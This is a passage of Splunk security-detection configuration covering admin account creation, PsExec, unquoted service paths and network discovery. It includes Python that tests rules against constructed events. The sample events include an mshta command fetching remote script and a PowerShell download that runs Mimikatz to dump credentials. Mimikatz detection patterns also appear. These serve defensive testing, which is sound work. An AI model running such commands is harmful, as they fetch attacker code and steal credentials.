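         lambda e: str(e.get("process_name", "")).lower() != "mshta.exe",
         ["MSHTA.EXE"], field="original_file_name"),
    Rule("Detect Mimikatz With PowerShell Script Block Logging",
         lambda e: e.get("EventCode") == 4104,
         ["*mimikatz*", "*-dumpcr*", "*sekurlsa::pth*", "*kerberos::ptt*",
          "*kerberos::golden*"], field="ScriptBlockText"),
]


def evaluate(events: List[Event], rules=RULES) -> List[Tuple[str, str, str]]:
    """Return (rule, dest, user) for every event/rule pair that matches.
    One event may trigger several rules, as the inline-mshta sample does."""
    hits = []
    for e in events:
        for r in rules:
            if r.where(e) and glob_any(e.get(r.field), r.patterns):
                hits.append((r.name, str(e.get("dest") or e.get("Computer")),
                             str(e.get("user") or e.get("UserID"))))
    return hits


# Constructed sample telemetry (not real data).
SAMPLE_EVENTS: List[Event] = [
    {"dest": "WS01", "user": "CORP\\alice", "process_name": "hh.exe",
     "original_file_name": "HH.EXE", "parent_process_name": "explorer.exe",
     "process": "hh.exe ms-its:C:\\Users\\alice\\Downloads\\doc.chm::/shell.htm"},
    {"dest": "WS01", "user": "CORP\\alice", "process_name": "mshta.exe",
     "original_file_name": "MSHTA.EXE", "parent_process_name": "winword.exe",
     "process": 'mshta.exe vbscript:Close(Execute("GetObject(""script:http://198.51.100.7/a.sct"")"))'},
    {"dest": "WS02", "user": "CORP\\bob", "process_name": "svchost.exe",
     "original_file_name": "MSHTA.EXE", "parent_process_name": "cmd.exe",
     "process": "C:\\Temp\\svchost.exe C:\\Temp\\u.hta"},
    {"Computer": "WS03", "UserID": "S-1-5-21-1-2-3-1105", "EventCode": 4104,
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"},
    # Benign: a help file opened by path (no ITSS handler) and an installer HTA by path.
    {"dest": "WS01", "user": "CORP\\alice", "process_name": "hh.exe",
     "original_file_name": "HH.EXE", "parent_process_name": "mmc.exe",
     "process": "hh.exe C:\\Windows\\Help\\mui\\0409\\mmc.chm"},
    {"dest": "WS02", "user": "CORP\\bob", "process_name": "mshta.exe",
     "original_file_name": "MSHTA.EXE", "parent_process_name": "msiexec.exe",
     "process": 'mshta.exe "C:\\Program Files\\Vendor\\setup.hta"'},
]

if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(hit)
```

Running it yields five hits: the ITSS launch, the renamed binary, the script block, and two for the single inline-mshta event, which matches both the inline-handler rule and the URL rule because the vbscript: payload embeds an http:// fetch. The `*about*` and `*its:*` patterns are deliberately loose substrings, which is why the known-false-positive notes on those rules ask for filtering.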
When a new account is created or an existing account is added to the Administrators group, this analytic identifies this behavior by looking for EventCode 4720 (A user account was created) or EventCode 4732 (A member was added to a security-enabled local group). This analytic specifically focuses on events where the Group_Name is set to Administrators. This detection is important because it suggests that an attacker has gained elevated privileges and can perform malicious actions with administrative access. This can lead to significant impact, such as unauthorized access to sensitive data, unauthorized modifications to systems or configurations, and potential disruption of critical services. Identifying this behavior is crucial for a Security Operations Center (SOC). Next steps include reviewing the details of the security event, including the user account that was created or added to the Administrators group. Also, examine the time span between the first and last occurrence of the event to determine if the behavior is ongoing. Additionally, consider any contextual information, such as the destination where the account was created or added to understand the scope and potential impact of the attack. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.001", "T1136"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects the creation of new accounts that have been elevated to local administrators so that you can take immediate action to mitigate the risks and prevent further unauthorized access or malicious activities. This detection is made by using the Splunk query `wineventlog_security` EventCode=4720 OR (EventCode=4732 Group_Name=Administrators) to search for relevant security events in the Windows event log. 
When a new account is created or an existing account is added to the Administrators group, this analytic identifies this behavior by looking for EventCode 4720 (A user account was created) or EventCode 4732 (A member was added to a security-enabled local group). This analytic specifically focuses on events where the Group_Name is set to Administrators. This detection is important because it suggests that an attacker has gained elevated privileges and can perform malicious actions with administrative access. This can lead to significant impact, such as unauthorized access to sensitive data, unauthorized modifications to systems or configurations, and potential disruption of critical services. Identifying this behavior is crucial for a Security Operations Center (SOC). Next steps include reviewing the details of the security event, including the user account that was created or added to the Administrators group. Also, examine the time span between the first and last occurrence of the event to determine if the behavior is ongoing. Additionally, consider any contextual information, such as the destination where the account was created or added to understand the scope and potential impact of the attack. action.escu.how_to_implement = You must be ingesting Windows event logs using the Splunk Windows TA and collecting event codes 4720 and 4732. action.escu.known_false_positives = The activity may be legitimate. For this reason, it's best to verify the account with an administrator and ask whether there was a valid service request for the account creation. 
If your local administrator group name is not "Administrators", this search may generate an excessive number of false positives action.escu.creation_date = 2024-02-14 action.escu.modification_date = 2024-02-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect New Local Admin account - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["DHS Report TA18-074A", "HAFNIUM Group", "CISA AA22-257A"] action.risk = 1 action.risk.param._risk_message = A $user$ on $dest$ was added recently. Identify if this was legitimate behavior or not. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect New Local Admin account - Rule action.correlationsearch.annotations = {"analytic_story": ["DHS Report TA18-074A", "HAFNIUM Group", "CISA AA22-257A"], "cis20": ["CIS 10"], "confidence": 70, "impact": 60, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.001", "T1136"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the creation of new accounts that have been elevated to local administrators so that you can take immediate action to mitigate the risks and prevent further unauthorized access or malicious activities. 
This detection is made by using the Splunk query `wineventlog_security` EventCode=4720 OR (EventCode=4732 Group_Name=Administrators) to search for relevant security events in the Windows event log. When a new account is created or an existing account is added to the Administrators group, this analytic identifies this behavior by looking for EventCode 4720 (A user account was created) or EventCode 4732 (A member was added to a security-enabled local group). This analytic specifically focuses on events where the Group_Name is set to Administrators. This detection is important because it suggests that an attacker has gained elevated privileges and can perform malicious actions with administrative access. This can lead to significant impact, such as unauthorized access to sensitive data, unauthorized modifications to systems or configurations, and potential disruption of critical services. Identifying this behavior is crucial for a Security Operations Center (SOC). Next steps include reviewing the details of the security event, including the user account that was created or added to the Administrators group. Also, examine the time span between the first and last occurrence of the event to determine if the behavior is ongoing. Additionally, consider any contextual information, such as the destination where the account was created or added to understand the scope and potential impact of the attack. 
action.notable.param.rule_title = Detect New Local Admin account action.notable.param.security_domain = access action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4720 OR (EventCode=4732 Group_Name=Administrators) | transaction src_user connected=false maxspan=180m | rename src_user as user | stats count min(_time) as firstTime max(_time) as lastTime by user dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_new_local_admin_account_filter` [ESCU - Detect Outlook exe writing a zip file - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for execution of process `outlook.exe` where the process is writing a `.zip` file to the disk. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for execution of process `outlook.exe` where the process is writing a `.zip` file to the disk. action.escu.how_to_implement = You must be ingesting data that records filesystem and process activity from your hosts to populate the Endpoint data model. This is typically populated via endpoint detection-and-response product, such as Carbon Black, or endpoint data sources, such as Sysmon. action.escu.known_false_positives = It is not uncommon for outlook to write legitimate zip files to the disk. 
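The New Local Admin search above groups 4720 and 4732 events per acting account with `transaction src_user connected=false maxspan=180m` and then summarises them with `stats`. The following Python is an added example, not part of this generated file or of the Splunk security_content project: it reproduces that selection, windowing and summary over constructed Security-log events, keeps the created or added account alongside the acting one, and exposes the group-name parameter so the documented false-positive case (a local administrators group not literally named "Administrators") can be seen. The field assignment (src_user = subject account performing the change, user = account created or added) is an assumption about the Splunk Add-on for Windows mapping, and the events are constructed.

```python
from datetime import datetime, timedelta
from typing import Dict, List

ADMIN_GROUP = "Administrators"        # the literal Group_Name the rule matches
MAXSPAN = timedelta(minutes=180)      # transaction ... maxspan=180m


def selected(e: Dict, admin_group: str = ADMIN_GROUP) -> bool:
    """Base search: EventCode=4720 OR (EventCode=4732 Group_Name=<admins>)."""
    if e["EventCode"] == 4720:
        return True
    return e["EventCode"] == 4732 and e.get("Group_Name") == admin_group


def summarise(user: str, window: List[Dict]) -> Dict:
    # The rule renames src_user to user, so the reported `user` is the account
    # that performed the change. The created/added account is kept separately
    # (target_users) because that is what an analyst has to validate.
    return {
        "user": user,
        "dest": sorted({e["dest"] for e in window}),
        "firstTime": window[0]["_time"],
        "lastTime": window[-1]["_time"],
        "count": len(window),
        "target_users": sorted({e["user"] for e in window}),
        "added_to_admins": any(e["EventCode"] == 4732 for e in window),
    }


def correlate(events: List[Dict], admin_group: str = ADMIN_GROUP,
              maxspan: timedelta = MAXSPAN) -> List[Dict]:
    """Approximate `transaction src_user connected=false maxspan=180m` plus
    `stats count min(_time) max(_time) by user dest`: selected events are
    ordered by time, split per src_user into windows whose first-to-last span
    never exceeds maxspan, and each window becomes one result row."""
    per_user: Dict[str, List[Dict]] = {}
    for e in sorted((x for x in events if selected(x, admin_group)),
                    key=lambda x: x["_time"]):
        per_user.setdefault(e["src_user"], []).append(e)

    results = []
    for user, evs in per_user.items():
        window = [evs[0]]
        for e in evs[1:]:
            if e["_time"] - window[0]["_time"] > maxspan:
                results.append(summarise(user, window))
                window = [e]
            else:
                window.append(e)
        results.append(summarise(user, window))
    return results


T0 = datetime(2024, 4, 17, 10, 0)
# Constructed Security-log events (not real data).
SAMPLE_EVENTS = [
    {"_time": T0, "EventCode": 4720, "dest": "WS01",
     "src_user": "CORP\\helpdesk1", "user": "svc_backup"},
    {"_time": T0 + timedelta(minutes=2), "EventCode": 4732, "dest": "WS01",
     "src_user": "CORP\\helpdesk1", "user": "svc_backup",
     "Group_Name": "Administrators"},
    {"_time": T0 + timedelta(minutes=3), "EventCode": 4732, "dest": "WS01",
     "src_user": "CORP\\helpdesk1", "user": "svc_backup",
     "Group_Name": "Remote Desktop Users"},          # not selected
    {"_time": T0 + timedelta(minutes=5), "EventCode": 4732, "dest": "WS02",
     "src_user": "CORP\\jdoe", "user": "support",
     "Group_Name": "Administrators"},                # existing account elevated
    {"_time": T0 + timedelta(hours=4), "EventCode": 4720, "dest": "WS01",
     "src_user": "CORP\\helpdesk1", "user": "tmpuser"},  # beyond maxspan
]

if __name__ == "__main__":
    for row in correlate(SAMPLE_EVENTS):
        print(row)
```

With the default group name this produces three rows: the helpdesk1 creation plus elevation (count 2), the separate helpdesk1 creation four hours later (count 1, a new window because it exceeds maxspan), and jdoe's elevation of an existing account. Passing a localized name such as "Administratoren" drops every 4732 from the base search, so only the bare 4720 creations remain and none of the rows can confirm an admin-group change.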
action.escu.creation_date = 2023-02-07 action.escu.modification_date = 2023-02-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Outlook exe writing a zip file - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Spearphishing Attachments", "Amadey", "Remcos"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Detect Outlook exe writing a zip file - Rule action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments", "Amadey", "Remcos"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for execution of process `outlook.exe` where the process is writing a `.zip` file to the disk. 
action.notable.param.rule_title = Detect Outlook exe writing a zip file action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where Processes.process_name=outlook.exe by _time span=5m Processes.parent_process_id Processes.process_id Processes.dest Processes.process_name Processes.parent_process_name Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | rename process_id as malicious_id| rename parent_process_id as outlook_id| join malicious_id type=inner[| tstats `security_content_summariesonly` count values(Filesystem.file_path) as file_path values(Filesystem.file_name) as file_name FROM datamodel=Endpoint.Filesystem where (Filesystem.file_path=*.zip* OR Filesystem.file_name=*.lnk ) AND (Filesystem.file_path=C:\\Users* OR Filesystem.file_path=*Local\\Temp*) by _time span=5m Filesystem.process_id Filesystem.file_hash Filesystem.dest | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | rename process_id as malicious_id| fields malicious_id outlook_id dest file_path file_name file_hash count file_id] | table firstTime lastTime user malicious_id outlook_id process_name parent_process_name file_name file_path | where file_name != "" | `detect_outlook_exe_writing_a_zip_file_filter` [ESCU - Detect Path Interception By Creation Of program exe - Rule] action.escu = 0 action.escu.enabled = 1 description = The detection Detect Path Interception By Creation Of program exe is detecting the abuse of unquoted service paths, which is a popular technique for privilege escalation. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1574.009", "T1574"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The detection Detect Path Interception By Creation Of program exe is detecting the abuse of unquoted service paths, which is a popular technique for privilege escalation. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Path Interception By Creation Of program exe - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to perform privilege escalation by using unquoted service paths. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 49}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Path Interception By Creation Of program exe - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1574.009", "T1574"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The detection Detect Path Interception By Creation Of program exe is detecting the abuse of unquoted service paths, which is a popular technique for privilege escalation. 
action.notable.param.rule_title = Detect Path Interception By Creation Of program exe action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=services.exe by Processes.user Processes.process_name Processes.parent_process_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | rex field=process "^.*?\\\\(?<service_process>[^\\\\]*\.(?:exe|bat|com|ps1))" | eval process_name = lower(process_name) | eval service_process = lower(service_process) | where process_name != service_process | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_path_interception_by_creation_of_program_exe_filter` [ESCU - Detect processes used for System Network Configuration Discovery - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for fast execution of processes used for system network configuration discovery on the endpoint. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1016"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for fast execution of processes used for system network configuration discovery on the endpoint. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions.
These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = It is uncommon for normal users to execute a series of commands used for network discovery. System administrators often use scripts to execute these commands. These can generate false positives. action.escu.creation_date = 2020-11-10 action.escu.modification_date = 2020-11-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect processes used for System Network Configuration Discovery - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Unusual Processes"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning multiple $process_name$ was identified on endpoint $dest$ by user $user$ typically not a normal behavior of the process. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 32}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 32}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 32}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 32}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect processes used for System Network Configuration Discovery - Rule action.correlationsearch.annotations = {"analytic_story": ["Unusual Processes"], "cis20": ["CIS 10"], "confidence": 80, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1016"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for fast execution of processes used for system network configuration discovery on the endpoint. 
action.notable.param.rule_title = Detect processes used for System Network Configuration Discovery action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where NOT Processes.user IN ("","unknown") by Processes.dest Processes.process_name Processes.parent_process_name Processes.user _time | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | search `system_network_configuration_discovery_tools` | transaction dest connected=false maxpause=5m |where eventcount>=5 | table firstTime lastTime dest user process_name process parent_process parent_process_name eventcount | `detect_processes_used_for_system_network_configuration_discovery_filter` [ESCU - Detect Prohibited Applications Spawning cmd exe - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for executions of cmd.exe spawned by a process that is often abused by attackers and that does not typically launch cmd.exe. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.003"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for executions of cmd.exe spawned by a process that is often abused by attackers and that does not typically launch cmd.exe. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. 
To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = There are circumstances where an application may legitimately execute and interact with the Windows command-line interface. Investigate and modify the lookup file, as appropriate. action.escu.creation_date = 2020-11-10 action.escu.modification_date = 2020-11-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Prohibited Applications Spawning cmd exe - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Command-Line Executions", "Suspicious MSHTA Activity", "Suspicious Zoom Child Processes", "NOBELIUM Group"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Prohibited Applications Spawning cmd exe - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Command-Line Executions", "Suspicious MSHTA Activity", "Suspicious Zoom Child Processes", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number 
of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_cmd` by Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.dest Processes.user| `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` |search [`prohibited_apps_launching_cmd`] | `detect_prohibited_applications_spawning_cmd_exe_filter` [ESCU - Detect PsExec With accepteula Flag - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for events where `PsExec.exe` is run with the `accepteula` flag in the command line. PsExec is a Microsoft Sysinternals utility (not built into Windows) that enables you to execute processes on other systems. It is fully interactive for console applications. This tool is widely used for launching interactive command prompts on remote systems. Threat actors leverage this extensively for executing code on compromised systems. If an attacker is running PsExec for the first time, they will be prompted to accept the end-user license agreement (EULA), which can be passed as the argument `accepteula` within the command line. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.002"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for events where `PsExec.exe` is run with the `accepteula` flag in the command line. PsExec is a Microsoft Sysinternals utility (not built into Windows) that enables you to execute processes on other systems. It is fully interactive for console applications. This tool is widely used for launching interactive command prompts on remote systems. Threat actors leverage this extensively for executing code on compromised systems.
If an attacker is running PsExec for the first time, they will be prompted to accept the end-user license agreement (EULA), which can be passed as the argument `accepteula` within the command line. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators can leverage PsExec for accessing remote systems and might pass `accepteula` as an argument if they are running this tool for the first time. 
However, it is not likely that you'd see multiple occurrences of this event on a machine action.escu.creation_date = 2021-09-16 action.escu.modification_date = 2021-09-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect PsExec With accepteula Flag - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["SamSam Ransomware", "DHS Report TA18-074A", "HAFNIUM Group", "DarkSide Ransomware", "Active Directory Lateral Movement", "CISA AA22-320A", "Sandworm Tools", "Volt Typhoon", "IcedID", "BlackByte Ransomware", "DarkGate Malware", "Rhysida Ransomware"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ running the utility for possibly the first time. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 35}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect PsExec With accepteula Flag - Rule action.correlationsearch.annotations = {"analytic_story": ["SamSam Ransomware", "DHS Report TA18-074A", "HAFNIUM Group", "DarkSide Ransomware", "Active Directory Lateral Movement", "CISA AA22-320A", "Sandworm Tools", "Volt Typhoon", "IcedID", "BlackByte Ransomware", "DarkGate Malware", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 70, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for events where `PsExec.exe` is run with the `accepteula` flag in the command line. PsExec is a Microsoft Sysinternals utility (not built into Windows) that enables you to execute processes on other systems. It is fully interactive for console applications. This tool is widely used for launching interactive command prompts on remote systems. Threat actors leverage this extensively for executing code on compromised systems. If an attacker is running PsExec for the first time, they will be prompted to accept the end-user license agreement (EULA), which can be passed as the argument `accepteula` within the command line.
action.notable.param.rule_title = Detect PsExec With accepteula Flag action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_psexec` Processes.process=*accepteula* by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)`| `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `detect_psexec_with_accepteula_flag_filter` [ESCU - Detect Rare Executables - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search returns a table of processes in a given window, removes process names that are in the allow list, and lists the 30 rarest processes discovered on different hosts. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search returns a table of processes in a given window, removes process names that are in the allow list, and lists the 30 rarest processes discovered on different hosts. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents.
